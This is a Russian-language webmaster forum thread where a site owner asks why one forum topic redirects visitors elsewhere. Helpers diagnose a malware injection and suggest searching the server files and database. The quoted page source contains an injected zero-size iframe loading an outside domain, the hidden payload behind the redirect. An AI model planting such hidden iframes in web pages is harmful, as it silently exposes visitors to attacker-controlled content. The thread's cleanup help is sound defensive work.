Перебрасывает на другую страницу

Raskrutchik
На сайте с 06.12.2005
Offline
152
3273

Есть у меня форум. Лицензия.

Недавно обнаружилась такая проблема. При заходу в одну тему, вот в эту - http://www.avapeople.com/index.php?showtopic=3046 пользователей перебрасывает на другой сайт.

В других разделах и темах такой проблемы нет. Именно в этой теме.

В коде видно следующее:


<!-- THE POST 123609 -->
<div class="postcolor" id='post-123609'><div align="center"><!--coloro:#333333--><span style="color:#333333"><!--/coloro--><i><div align='center'><iframe width="0" height="0" src="http://mdfc.info"></iframe><!--sizeo:3--><span style="font-size:12pt;line-height:100%"><!--/sizeo--><!--fonto:Georgia--><span style="font-family:Georgia"><!--/fonto-->Продолжается серия конкурсов на тему ..

Откуда такая ссылка взялась? В php мало разбираюсь, поэтому прошу помочь как-то удалить эту бяку.

Квесты в реальности (https://livequests.ru/)
DI
На сайте с 03.01.2007
Offline
123
#1

а php тут совсем не при чем.

Проблема в 1 сообщении, и скопированный Вами код именно оттуда. Перед началом текста (до "Продолжается серия конкурсов на тему...") есть маленький квадратик, это тот самый iframe. Почему он так действует - ковыряться лень, просто удалите его, скорее всего поможет.

А вообще, стоит запретить ненужные теги в форуме, а то таким образом можно не только безобидный редирект устроить.

Высказывание идиотского утверждения требует на порядок меньше усилий, чем его последовательное и обоснованное опровержение и более того, иногда это опровержение вообще невозможно. © (http://zhurnal.lib.ru/s/shapiro_m_a/raspidiota.shtml)
Raskrutchik
На сайте с 06.12.2005
Offline
152
#2
DenIT:
а php тут совсем не при чем.
Проблема в 1 сообщении, и скопированный Вами код именно оттуда. Перед началом текста (до "Продолжается серия конкурсов на тему...") есть маленький квадратик, это тот самый iframe. Почему он так действует - ковыряться лень, просто удалите его, скорее всего поможет.

А вообще, стоит запретить ненужные теги в форуме, а то таким образом можно не только безобидный редирект устроить.

Да помогает, когда все сообщение заменишь или удалишь.

Только вот откуда код подгружается? Код поста:


Продолжается серия конкурсов на тему "Новый год". Эту серию продолжает конкурс под названием

Скажи-ка нам Снегурочка, где была?!


Для того, чтобы принять участие в конкурсе вы должны найти/сделать самостоятельно аватар с изображением Снегурочки, который бы подходил к нашим победителям Дедам Морозам и прислать мне в приват. Аватар должен иметь соответствующие размеры - 150*150. Конкретные ограничения по весу не накладываются. Работы могут быть как статичными, так и анимированными. Один участник может прислать от 1ого до 3х вариантов на свое усмотрение. Присланные картинки, не подходящие под эти ограничения будут исключены из конкурса.



или



Вы можете голосовать за 3 понравившиеся картинки в течении 7 дней.

27.11 голосование закончится и будут подведены итоги и названы победители.


ЗЫ: Не забываем, что Новый Год на нашем форуме должен быть фантастически фееричным, веселым и необычным! Поэтому и Снегурочка у нас должна быть особенной, под стать Дедам Морозам!

Итак, предлагаю на Ваш суд следующие работы:

1.

2.

3.

4.

5.

6.

7.

8.

9.

10.

11.
S
На сайте с 13.07.2007
Offline
56
#3

Смотрите не в коде поста, а в шаблоне и самих скриптах форума.

fima32
На сайте с 12.01.2006
Offline
132
#4
Raskrutchik:
Только вот откуда код подгружается?

Ну как откуда?

Вот он Ваш вирус в ифрейме: <iframe width="0" height="0" src="http://mdfc.info">

Вот еще почитайте про это вирус: /ru/forum/126831

DI
На сайте с 03.01.2007
Offline
123
#5

мда

раньше были javascipt'ы, сейчас пошли iframe. В таком случае - да, только чистить файлы index.*

Raskrutchik
На сайте с 06.12.2005
Offline
152
#6

В index файлах не нашел ничего. Именно в этом посте или в этой теме эта фигня. На остальных страницах все нормально.

S
На сайте с 13.07.2007
Offline
56
#7

Ну дык пробегитесь поиском по всем файлам форума со словом mdfc.info - найдете.

DyaDya
На сайте с 11.04.2007
Offline
147
#8
Raskrutchik:
В index файлах не нашел ничего. Именно в этом посте или в этой теме эта фигня. На остальных страницах все нормально.

Форумы обычно на шаблонах, а подобные вирусники заражают любые php, html и т.д. а не только index-ные файлы

поэтому пройдись поиском фрагмента по серваку.

Если на серваке не найдешь, значит в базе данных точно он есть. Ты суслика видишь? - а он есть!

Обязательно найдешь и ты.

И если дыру не заделаешь, тебя так и будут таким "безобидным кодом" заражать. Да только я на твой сайт не пойду :)

Выбирайте качественный хостинг (http://vashmaster.ru/informaciya/o_poleznyh_programmah/news83.php) и продвигайте сайты в СЕОПУЛЬТ (http://seopult.ru/ref.php?ref=72b5ed9561fe66a1). А на «SAPE» я в обиде :) Не упрекайте за очепятки, пишу вслепую (http://ergosolo.ru/) и также делаю сайты (http://www.vashmaster.ru/) ;)

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий